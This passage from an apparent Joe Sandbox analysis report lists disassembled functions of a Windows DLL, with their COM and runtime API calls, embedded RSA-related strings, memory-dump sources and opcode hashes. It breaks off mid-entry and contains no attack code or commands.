                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: type_info::operator!=
                                                          • String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent
                                                          • API String ID: 2241493438-339133643
                                                          • Opcode ID: 7c511a0b616cf420dca041e4b82dde2772adc92857d783b898482886b466766a
                                                          • Instruction ID: d63a1724fecf13749a0b3971bb854f881970d654f3e137282720ae997f1ad225
                                                          • Opcode Fuzzy Hash: 7c511a0b616cf420dca041e4b82dde2772adc92857d783b898482886b466766a
                                                          • Instruction Fuzzy Hash: 93318D71914344CEC7409FB8C84559EFBF1AFD5204F058A2EF4849B760EB71A949CB82
                                                          Function 6CF70457 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID: RS%e
                                                          • API String ID: 4225690600-1409579784
                                                          • Opcode ID: 223d089181698b23298e53e35c96010127e6db9baf48dcd8d6fb204503b3eed4
                                                          • Instruction ID: 89b29ccae007f0cb475c3bd90850778ca3292fffc33e8217467a9ddd03e470a7
                                                          • Opcode Fuzzy Hash: 223d089181698b23298e53e35c96010127e6db9baf48dcd8d6fb204503b3eed4
                                                          • Instruction Fuzzy Hash: AC314BB0A01618DFCB20CFA9DC84B9DB7B9AF85304F24859AE418E7642CB72DD408F60
                                                          Function 6CF6AA00 Relevance: 12.3, APIs: 8, Instructions: 309COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit
                                                          • String ID:
                                                          • API String ID: 2610073882-0
                                                          • Opcode ID: 637bd9b895f03f4b76466acecd247e55f80459ff33518000948936d112edb26d
                                                          • Instruction ID: 7935bbcf9a27fd0addaa97e8e3180363aff094a5d8a265c454888aadcf71881c
                                                          • Opcode Fuzzy Hash: 637bd9b895f03f4b76466acecd247e55f80459ff33518000948936d112edb26d
                                                          • Instruction Fuzzy Hash: 61C146716087119FC300DF69C880A5BB7EAFFC9708F248A4DE5949BB65D731E845CB92
                                                          Function 6CF69D00 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF69DEB
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF69DFB
                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF69E29
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF69F25
                                                          • VariantClear.OLEAUT32(?), ref: 6CF69FE5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                                          • String ID: @
                                                          • API String ID: 3214203402-2766056989
                                                          • Opcode ID: 26a27b3fdfc39843e977758d54e012596941cf4790fb1f3d93806c2c55a6bb8e
                                                          • Instruction ID: 5fdeeabd9a801bab26a0e6dc4a335848f74daa2e267c3e2c84aa06609058b01b
                                                          • Opcode Fuzzy Hash: 26a27b3fdfc39843e977758d54e012596941cf4790fb1f3d93806c2c55a6bb8e
                                                          • Instruction Fuzzy Hash: E9D17B71E00249DFDB00DFA9C980A9DBBB5FF48308F25816DE515ABB54DB31AA45CF90
                                                          Function 6CF6B300 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF6B3EB
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF6B3FB
                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF6B429
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF6B525
                                                          • VariantClear.OLEAUT32(?), ref: 6CF6B5E5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                                          • String ID: @
                                                          • API String ID: 3214203402-2766056989
                                                          • Opcode ID: ebaf7a38d06023090003f3be6c50faff72d4ce0aa64ac3f376e355d9d400a994
                                                          • Instruction ID: 6a2393f7ef71b4771e30f6d1ad4bde9d182a5d55ade48d564a1d8ede930c3e6e
                                                          • Opcode Fuzzy Hash: ebaf7a38d06023090003f3be6c50faff72d4ce0aa64ac3f376e355d9d400a994
                                                          • Instruction Fuzzy Hash: 18D16971E002498FDB00DFA9C884AADBBB5FF48308F24859DE515ABB54D731AE46DF90
                                                          Function 6CF91580 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 277COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF916B2
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF9180A
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                          Strings
                                                          • : this key is too short to encrypt any messages, xrefs: 6CF9162A
                                                          • for this public key, xrefs: 6CF91771
                                                          • : message length of , xrefs: 6CF9170D
                                                          • exceeds the maximum of , xrefs: 6CF9173F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw$ExceptionRaiseXinvalid_argumentstd::_
                                                          • String ID: exceeds the maximum of $ for this public key$: message length of $: this key is too short to encrypt any messages
                                                          • API String ID: 3807434085-412673420
                                                          • Opcode ID: 3d0a681c0ebce0c64c1f16f72cc01a6169d65fa3605b1ce1a3394dddc67eceda
                                                          • Instruction ID: 31ea7edf8cfe318ca0e43551451c6b0be36ecb94b8fbacac22416a1d72883489
                                                          • Opcode Fuzzy Hash: 3d0a681c0ebce0c64c1f16f72cc01a6169d65fa3605b1ce1a3394dddc67eceda
                                                          • Instruction Fuzzy Hash: E3B14A716083809FD320DB69C880BDBBBE9AFD9304F05891DE59D87751DB71A909CBA3
                                                          Function 6CFB1250 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CFB126E
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB90ED
                                                            • Part of subcall function 6CFB90D8: __CxxThrowException@8.LIBCMT ref: 6CFB9102
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB9113
                                                          • _memmove.LIBCMT ref: 6CFB12E0
                                                          • _memmove.LIBCMT ref: 6CFB1305
                                                          • _memmove.LIBCMT ref: 6CFB1342
                                                          • _memmove.LIBCMT ref: 6CFB135F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                          • String ID: deque<T> too long
                                                          • API String ID: 4034224661-309773918
                                                          • Opcode ID: 962e1fea95a70b6b3627ed57c310512fce263e4e3ff5447cdc272b0ed77cd641
                                                          • Instruction ID: 5f27665e47a9c51b0d4b8ccde68ad62529ec63e7f05167a176f9119725f3f6f6
                                                          • Opcode Fuzzy Hash: 962e1fea95a70b6b3627ed57c310512fce263e4e3ff5447cdc272b0ed77cd641
                                                          • Instruction Fuzzy Hash: FC41C172A042059BD704CE29DC91A6BB7E6EFD4214F1DC62CE849E7B44FB34ED0986A1
                                                          Function 6CFB13A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CFB13BE
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB90ED
                                                            • Part of subcall function 6CFB90D8: __CxxThrowException@8.LIBCMT ref: 6CFB9102
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB9113
                                                          • _memmove.LIBCMT ref: 6CFB1431
                                                          • _memmove.LIBCMT ref: 6CFB1456
                                                          • _memmove.LIBCMT ref: 6CFB1493
                                                          • _memmove.LIBCMT ref: 6CFB14B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                          • String ID: deque<T> too long
                                                          • API String ID: 4034224661-309773918
                                                          • Opcode ID: 647c138c9deaee9f4ce4c90310f82d79a959a358c67d00b89a40b8d21e27d412
                                                          • Instruction ID: 2ff317c3fb296de5275b4a3123c366415e45373c6c2a5255d3aee9325845a327
                                                          • Opcode Fuzzy Hash: 647c138c9deaee9f4ce4c90310f82d79a959a358c67d00b89a40b8d21e27d412
                                                          • Instruction Fuzzy Hash: 4841D372A042058BC704CE29DC9196BB7E6EFD4214F1DC62DE84AE7B44FB74ED0987A1
                                                          Function 6CF54D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF54DA9
                                                            • Part of subcall function 6CFB9125: std::exception::exception.LIBCMT ref: 6CFB913A
                                                            • Part of subcall function 6CFB9125: __CxxThrowException@8.LIBCMT ref: 6CFB914F
                                                            • Part of subcall function 6CFB9125: std::exception::exception.LIBCMT ref: 6CFB9160
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF54DCA
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF54DE5
                                                          • _memmove.LIBCMT ref: 6CF54E4D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                          • String ID: invalid string position$string too long
                                                          • API String ID: 443534600-4289949731
                                                          • Opcode ID: e07ea42919a0719cc9e870b3dc3320ee459d9aa9b6e4789b8c5a273a1cf78fdc
                                                          • Instruction ID: e51328dffb701d91e86241a136f0c2103c2b2fcf260ec4528d87495f1b793868
                                                          • Opcode Fuzzy Hash: e07ea42919a0719cc9e870b3dc3320ee459d9aa9b6e4789b8c5a273a1cf78fdc
                                                          • Instruction Fuzzy Hash: 0231EA323042108FD3248F6CE880B9AFBE5AFA0365B50462EE651CBB40C771D9608791
                                                          Function 6CFC44E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Name::operator+$NameName::
                                                          • String ID: throw(
                                                          • API String ID: 168861036-3159766648
                                                          • Opcode ID: cfb8b833935199dba66e0ce8f3a352d804db5a06459c8949ced7140d283abdff
                                                          • Instruction ID: 31a6c9929a902de0638236eb7a9576fa1caba09425a64322e1df5516d5c070b8
                                                          • Opcode Fuzzy Hash: cfb8b833935199dba66e0ce8f3a352d804db5a06459c8949ced7140d283abdff
                                                          • Instruction Fuzzy Hash: E4019EB4B0010AAFCF04DBA4C881EFF7BB9EB84748F054555E9019B794DB70EA4A8B91
                                                          Function 6CFBE9B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6CFE9880,00000008,6CFBEAC1,00000000,00000000,?,?,6CFBD7DD,6CFB9DEF,00000000,?,6CFB9BD4,6CF51290,CA0C7769), ref: 6CFBE9CA
                                                          • __lock.LIBCMT ref: 6CFBE9FE
                                                            • Part of subcall function 6CFC2438: __mtinitlocknum.LIBCMT ref: 6CFC244E
                                                            • Part of subcall function 6CFC2438: __amsg_exit.LIBCMT ref: 6CFC245A
                                                            • Part of subcall function 6CFC2438: EnterCriticalSection.KERNEL32(6CFB9BD4,6CFB9BD4,?,6CFBEA03,0000000D), ref: 6CFC2462
                                                          • InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 6CFBEA0B
                                                          • __lock.LIBCMT ref: 6CFBEA1F
                                                          • ___addlocaleref.LIBCMT ref: 6CFBEA3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                          • String ID: KERNEL32.DLL
                                                          • API String ID: 637971194-2576044830
                                                          • Opcode ID: ab717393c758dcf68dfe3eb945e20f73c56e2bdd1236966dcf919a4179b89b0c
                                                          • Instruction ID: aec3621169fa7626ad4ea7a80c626485595384a4f49ba0f452f4946703d205f0
                                                          • Opcode Fuzzy Hash: ab717393c758dcf68dfe3eb945e20f73c56e2bdd1236966dcf919a4179b89b0c
                                                          • Instruction Fuzzy Hash: C201C0B1900B00DFD7209F66C90438AFBF4FF41328F10890DD49AA3BA0CB74AA04CB21
                                                          Function 6CF6E120 Relevance: 9.4, APIs: 6, Instructions: 364COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6CF6E29B
                                                          • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6CF6E2B6
                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CF6E2D7
                                                            • Part of subcall function 6CF75760: std::tr1::_Xweak.LIBCPMT ref: 6CF75769
                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CF6E309
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF6E523
                                                          • InterlockedCompareExchange.KERNEL32(6CFFC6A4,45524548,4B4F4F4C), ref: 6CF6E544
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                                          • String ID:
                                                          • API String ID: 2722669376-0
                                                          • Opcode ID: 8bdbef748db3467f6b0440b594b2a7e6bfb7df862d720354e4f2898be6c53d84
                                                          • Instruction ID: aa8c613b520f4c9940c0ecbee9f1c39d33081160d4f0a6db677c555a8189e15d
                                                          • Opcode Fuzzy Hash: 8bdbef748db3467f6b0440b594b2a7e6bfb7df862d720354e4f2898be6c53d84
                                                          • Instruction Fuzzy Hash: 0CD1AEB2A002059FDB10CFA6CC84BDE77B8EF45308F148569E945EBB81E775ED448BA1
                                                          Function 6CF78A9A Relevance: 9.1, APIs: 6, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
